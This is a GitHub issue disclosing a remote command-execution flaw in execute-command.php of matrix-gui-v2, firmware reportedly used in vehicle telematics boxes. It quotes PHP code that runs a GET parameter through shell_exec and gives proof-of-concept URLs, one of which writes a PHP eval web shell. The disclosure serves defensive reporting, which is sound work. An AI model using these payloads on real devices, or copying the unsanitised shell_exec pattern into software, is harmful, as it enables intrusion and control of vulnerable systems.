### ISSUE TITLE
execute-command.php Command execution vulnerability

### ISSUE THREAD

**Issue by xiaoming-king** [varigit/matrix-gui-v2#1]
The execute-command.php file exists in the  \www\pages\matrix-gui-2.0 directory of the firmware
Vulnerability type: command execution

This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous
![下载](https://user-images.githubusercontent.com/65775367/218629265-078461b9-5d79-445b-b587-9ad60b81b770.png)
![下载](https://user-images.githubusercontent.com/65775367/218629386-9fd1ddbe-c19d-4aa4-ada3-2a0fa8ab6aa7.jpg)

`<?php

$command = $_GET['command'];
$output = shell_exec($command);

echo $output;

?>
`
Through shell_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer

Vulnerability exploitation process:
Pass the parameter command to the shell through get_ Exec for command execution and final output

POC：
/execute-command.php?command=ls
/execute-command.php?command=echo "<?php @eval(\$_POST['test']);?>" > shell.php

Example:
http://192.168.160.128:7777/execute-command.php?command=ls
![image](https://user-images.githubusercontent.com/65775367/218624776-6237e28b-61de-4256-bf8f-4581526456c7.png)

/execute-command.php?command=echo "<?php @eval(\$_POST['test']);?>" > shell.php
![image](https://user-images.githubusercontent.com/65775367/218624886-262328d2-f43a-4900-8de9-f1b09bbe8a38.png)
![image](https://user-images.githubusercontent.com/65775367/218624899-7bac8ee6-5cb2-44a1-8929-01638f8cb33b.png)
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.
